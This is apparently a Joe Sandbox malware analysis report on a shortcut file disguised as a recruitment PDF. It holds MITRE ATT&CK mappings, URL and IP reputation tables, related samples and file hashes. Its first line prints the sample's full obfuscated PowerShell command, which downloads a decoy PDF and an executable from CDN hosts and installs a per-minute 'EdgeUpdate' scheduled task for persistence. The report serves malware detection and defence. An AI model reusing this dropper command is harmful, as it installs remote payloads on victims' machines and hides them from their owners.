Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 $progresspreference = 'silentlycontinue';i''w''r "https://pd560.b-cdn.net/fha" -outfile c:\users\public\recruit1123.pdf;s''a''p''s c:\users\public\recruit1123.pdf;i''w''r "https://pld956.b-cdn.net/jhv" -outfile "c:\windows\tasks\jumbo";r''e''n -path "c:\windows\tasks\jumbo" -newname "c:\windows\tasks\services.exe";c''p''i 'c:\users\public\recruit1123.pdf' -destination .;s''c''h''t''a''s''k''s'' /create /sc minute /tn edgeupdate /tr 'c:\windows\tasks\services';e''r''a''s''e *d?.?n?

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /Sc minute /Tn EdgeUpdate /tr C:\Windows\Tasks\Services

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	21 Virtualization/Sandbox Evasion	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	14 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Recruit1123.pdf.lnk	25%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://bunny.net/v2/images/bunnynet-logo.svg	0%	Avira URL Cloud	safe
https://pld956.b-cdn.ne	0%	Avira URL Cloud	safe
https://bunny.net	0%	Avira URL Cloud	safe
http://fonts.bunny.net/css?family=Rubik:300	0%	Avira URL Cloud	safe
https://go.microsoft.co	0%	Avira URL Cloud	safe
https://bunny.net	0%	Virustotal		Browse
https://bunny.net/v2/images/bunnynet-logo.svg	0%	Virustotal		Browse
http://fonts.bunny.net/css?family=Rubik:300	0%	Virustotal		Browse
https://go.microsoft.co	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pld956.b-cdn.net	212.102.46.118	true	false		high
pd560.b-cdn.net	212.102.46.118	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pld956.b-cdn.net/jhv	false		high
https://pd560.b-cdn.net/fha	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1696610118.0000015311922000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pld956.b-cdn.net/jhvnz	powershell.exe, 00000000.00000002.1702027969.000001537F6F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pd560.b-cdn.net	powershell.exe, 00000000.00000002.1680986165.0000015302EA3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1680986165.0000015301AE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015301B5E000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
https://go.microsoft.co	powershell.exe, 00000000.00000002.1700241470.0000015319A30000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1680986165.0000015301AE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015301B5E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.1680986165.0000015302A28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pd560.b-cdn.net/fha-OutFileC:	powershell.exe, 00000000.00000002.1701051423.0000015319D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702547904.000001537F738000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702027969.000001537F6C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703317919.000001537FDC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699997022.00000153199E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703148422.000001537FA75000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bunny.net/v2/images/bunnynet-logo.svg	powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pd560.b-cdn.net/fhaP%3	powershell.exe, 00000000.00000002.1702547904.000001537F79E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pld956.b-cdn.ne	powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1680986165.0000015301AE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015301B5E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pd560.b-cdn.net	powershell.exe, 00000000.00000002.1680986165.0000015302A28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pld956.b-cdn.net	powershell.exe, 00000000.00000002.1680986165.0000015303070000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bunny.net	powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1696610118.0000015311922000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1696610118.0000015311A65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1680986165.00000153018B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pld956.b-cdn.net	powershell.exe, 00000000.00000002.1680986165.00000153035ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fonts.bunny.net/css?family=Rubik:300	powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1680986165.00000153018B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css	powershell.exe, 00000000.00000002.1680986165.0000015302ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015303649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680986165.0000015302ECD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pd560.b-cdn.net/	powershell.exe, 00000000.00000002.1680986165.0000015303070000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pld956.b-cdn.net/jhv-OutFileC:	powershell.exe, 00000000.00000002.1701051423.0000015319D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702547904.000001537F738000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1702027969.000001537F6C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703317919.000001537FDC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699997022.00000153199E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1703148422.000001537FA75000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.102.46.118	pld956.b-cdn.net	Italy		60068	CDN77GB	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1344055
Start date and time:	2023-11-17 11:12:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Recruit1123.pdf.lnk
Detection:	MAL
Classification:	mal84.rans.evad.winLNK@4/5@2/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5224 because it is empty
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
10:12:59	Task Scheduler	Run new task: EdgeUpdate path: C:\Windows\Tasks\Services
11:12:56	API Interceptor	23x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
212.102.46.118	http://effectual-currency.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse
	http://roan-decks.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse
	https://fpso-yfb3p.ondigitalocean.app/rkEX0win0x0786x0999xrkhkxpErr999x/index.php?click_id=611h5axzlp1fwctf&clickid=68ef85ae89b43fdcef0a32b9b672626f&phone=+1-833-741-5228&rezp=611h5axzlp1fwctf-tncle.com-658#	Get hash	malicious	TechSupportScam	Browse
	https://gamma.app/public/Sharron-Saunders-shared-Documentdocx-with-you-vxzxiprc3hdmiwc	Get hash	malicious	Unknown	Browse
	https://gyromagnetic-guards.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse
	https://link.mail.beehiiv.com/ls/click?upn=GGPk-2BZH2RXNe-2BKehgfYwwX1RSMw4sFs25L5A8ZIwQHHjAenLqRzbJCc6rwWNIO1wuLXtRsxUIVBBcEFRInDr1hUDLvbey2xIeZqdZ9YKBxgG4G-2F4-2B-2FFIGB55tIBT5cdYKDHO5CbQoYi6yPDFpBOvV5-2BMIJnt5oiNItDMym-2Fxs68f8zFW4YAXYYlpGgLRSXvtMDNmKZL0ov8KxkQXhEqKTyU-2F0-2FTptYRE7HdrCMSsyjNGFxhW-2FXt6Hz6nhN26S3-2Brdh8-2BsjpSEOsIu7M3HRgTT2VS3dni6jroMLLpzxu0Xqj71XYHqlnzsbxfjAShh4PUVbHy_nqBp-2F0ddnm8f0taaXl9nbEYI0BKvbL66qnF5gv-2BhpRCmp5A5faBRmG-2FpedggFzdnLSLt3Es062NhhBlEtiJP7xfu0Ihr-2FSWXidkRdiY7EACXxhWj9bzt-2FGHqdY6KVs7dR28chOvZYGnWUSH2gshjCKyQNC2iEPP-2BZlxt0T-2BXA-2BFjn-2BtK-2BbMANiz4-2BWQojjWcGfYWrtgL1QfnXHd-2F-2Bwxp-2FRrXQDStqbmvqVprDpPisE8UhHQeFfRRo7btt6OZN-2F1SgK2bkxf-2BXyf60neisbdOQoWwKNq71gY8FND9URb3FMt6YoKrjJfChljTmA7FWnQK0ez9xVpsbZ2qqo6EBkmgAtxnyL42peOuuk-2FSa2DagYl3gnVj1uCzxwG8FBGuHFyyx04smitDpKEzHPo2Po22BNYukpjBkAr1oRW4-2BlHMuVadQ67G7x7WJ2QAsYw050DJ	Get hash	malicious	Unknown	Browse
	https://c3acb688.caspio.com/dp/f535d00083ee282eee3946f5b89d	Get hash	malicious	Unknown	Browse
	https://twedex.nimbusweb.me/share/9506761/5np79hpqrek3vutdbiav	Get hash	malicious	Unknown	Browse
	http://crossing-frames.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse
	http://restorativeaccount.000webhostapp.com/	Get hash	malicious	Unknown	Browse
	http://likeaevs.life	Get hash	malicious	Unknown	Browse
	https://mainpage.me/vitacco	Get hash	malicious	HTMLPhisher	Browse
	http://amendatory-warranty.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse
	http://matthiasparks.site/4930%20New/Win08Ay0Er08d8d77/index.html	Get hash	malicious	TechSupportScam	Browse
	https://john-lewis-gift-card-23-uk.brizy.site	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CDN77GB	http://effectual-currency.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	http://roan-decks.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	http://freeinvoicetemplates.org/	Get hash	malicious	Unknown	Browse	89.187.167.3
	http://www.dynamicfc.com/milonic_src.js	Get hash	malicious	Unknown	Browse	89.187.167.9
	https://fpso-yfb3p.ondigitalocean.app/rkEX0win0x0786x0999xrkhkxpErr999x/index.php?click_id=611h5axzlp1fwctf&clickid=68ef85ae89b43fdcef0a32b9b672626f&phone=+1-833-741-5228&rezp=611h5axzlp1fwctf-tncle.com-658#	Get hash	malicious	TechSupportScam	Browse	212.102.46.118
	https://gamma.app/public/Sharron-Saunders-shared-Documentdocx-with-you-vxzxiprc3hdmiwc	Get hash	malicious	Unknown	Browse	212.102.46.118
	https://nab-support.com/LiveChat.exe	Get hash	malicious	Unknown	Browse	185.229.191.44
	https://gyromagnetic-guards.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	https://link.mail.beehiiv.com/ls/click?upn=GGPk-2BZH2RXNe-2BKehgfYwwX1RSMw4sFs25L5A8ZIwQHHjAenLqRzbJCc6rwWNIO1wuLXtRsxUIVBBcEFRInDr1hUDLvbey2xIeZqdZ9YKBxgG4G-2F4-2B-2FFIGB55tIBT5cdYKDHO5CbQoYi6yPDFpBOvV5-2BMIJnt5oiNItDMym-2Fxs68f8zFW4YAXYYlpGgLRSXvtMDNmKZL0ov8KxkQXhEqKTyU-2F0-2FTptYRE7HdrCMSsyjNGFxhW-2FXt6Hz6nhN26S3-2Brdh8-2BsjpSEOsIu7M3HRgTT2VS3dni6jroMLLpzxu0Xqj71XYHqlnzsbxfjAShh4PUVbHy_nqBp-2F0ddnm8f0taaXl9nbEYI0BKvbL66qnF5gv-2BhpRCmp5A5faBRmG-2FpedggFzdnLSLt3Es062NhhBlEtiJP7xfu0Ihr-2FSWXidkRdiY7EACXxhWj9bzt-2FGHqdY6KVs7dR28chOvZYGnWUSH2gshjCKyQNC2iEPP-2BZlxt0T-2BXA-2BFjn-2BtK-2BbMANiz4-2BWQojjWcGfYWrtgL1QfnXHd-2F-2Bwxp-2FRrXQDStqbmvqVprDpPisE8UhHQeFfRRo7btt6OZN-2F1SgK2bkxf-2BXyf60neisbdOQoWwKNq71gY8FND9URb3FMt6YoKrjJfChljTmA7FWnQK0ez9xVpsbZ2qqo6EBkmgAtxnyL42peOuuk-2FSa2DagYl3gnVj1uCzxwG8FBGuHFyyx04smitDpKEzHPo2Po22BNYukpjBkAr1oRW4-2BlHMuVadQ67G7x7WJ2QAsYw050DJ	Get hash	malicious	Unknown	Browse	212.102.46.118
	http://www.blueskyre.com	Get hash	malicious	Phisher	Browse	212.102.46.9
	https://c3acb688.caspio.com/dp/f535d00083ee282eee3946f5b89d	Get hash	malicious	Unknown	Browse	212.102.46.118
	https://twedex.nimbusweb.me/share/9506761/5np79hpqrek3vutdbiav	Get hash	malicious	Unknown	Browse	212.102.46.118
	http://crossing-frames.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	http://restorativeaccount.000webhostapp.com/	Get hash	malicious	Unknown	Browse	212.102.46.118
	http://likeaevs.life	Get hash	malicious	Unknown	Browse	212.102.46.118
	https://mainpage.me/vitacco	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	https://analytics.webnorth.cloud/?module=Login&action=acceptInvitation&token=4e85c7ac842c08a74fec44d4668b7a9a	Get hash	malicious	Unknown	Browse	212.102.46.9
	http://amendatory-warranty.000webhostapp.com/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	http://matthiasparks.site/4930%20New/Win08Ay0Er08d8d77/index.html	Get hash	malicious	TechSupportScam	Browse	212.102.46.118
	https://john-lewis-gift-card-23-uk.brizy.site	Get hash	malicious	Unknown	Browse	212.102.46.118

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	gvDkwsts.posh.ps1	Get hash	malicious	Unknown	Browse	212.102.46.118
	Outstanding_Invoices.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	https://form.jotform.com/233198835799074	Get hash	malicious	Unknown	Browse	212.102.46.118
	SecuriteInfo.com.IL.Trojan.MSILZilla.30386.7065.3065.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	company profile.exe	Get hash	malicious	AgentTesla, NSISDropper	Browse	212.102.46.118
	SecuriteInfo.com.Win32.PWSX-gen.17075.9697.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	http://telegram58.cc/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	https://03diminstr.z19.web.core.windows.net/	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	SHIPPING_DOC.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	http://dalinoxin.de	Get hash	malicious	Unknown	Browse	212.102.46.118
	Remittance_Advice_Receipt_13-11-2023.html	Get hash	malicious	HTMLPhisher	Browse	212.102.46.118
	SecuriteInfo.com.Win32.PWSX-gen.8485.25115.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	INV_and_PAK.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	invoice.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	CredidCIC.zip	Get hash	malicious	Unknown	Browse	212.102.46.118
	Quotation.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	http://www.bigrockdesigns.com	Get hash	malicious	Unknown	Browse	212.102.46.118
	Factuur_beheerskosten.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	Payment_Advice_Ref_4567TR_TT757.exe	Get hash	malicious	AgentTesla	Browse	212.102.46.118
	http://www.tacabinetry.com	Get hash	malicious	Unknown	Browse	212.102.46.118

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5409
Entropy (8bit):	3.5030949401554645
Encrypted:	false
SSDEEP:	48:Nv1zELbsWmdLXuH2+ddXlRASogZokeddXl4ASogZoQ1:xiLgW+uZddXJHUddXeH/
MD5:	7700CCD2FF310D668A5B5888C39D3B2D
SHA1:	75ED2EDC68A4AEF5E4706BA63FFD02D2726DD08A
SHA-256:	FE64738BA2D034AC168FD8603DF960219A04D418F7302DDAFDC3CE78DA040711
SHA-512:	16C327DE91CA0C87FDAA6E950F11592E1FEEB32100CBBEA942D0DF50BFB6A62C4A08AAF23CCA3EE7C551AA0F9FCBB1D7D06B6E24C32520410C4537C10DB780E7
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.`.. ....W........>......>................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v....7".........>.....t.2.....qW.Q .RECRUI~1.LNK..X......DWO`qW.Q..........................G...R.e.c.r.u.i.t.1.1.2.3...p.d.f...l.n.k.......Y...............-.......X...........O..#.....C:\Users\user\Desktop\Recruit1123.pdf.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e..................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oousz00f.vha.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shg1umoc.4dp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JAP8UAGKQEG5WI0P5G7E.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5409
Entropy (8bit):	3.5030949401554645
Encrypted:	false
SSDEEP:	48:Nv1zELbsWmdLXuH2+ddXlRASogZokeddXl4ASogZoQ1:xiLgW+uZddXJHUddXeH/
MD5:	7700CCD2FF310D668A5B5888C39D3B2D
SHA1:	75ED2EDC68A4AEF5E4706BA63FFD02D2726DD08A
SHA-256:	FE64738BA2D034AC168FD8603DF960219A04D418F7302DDAFDC3CE78DA040711
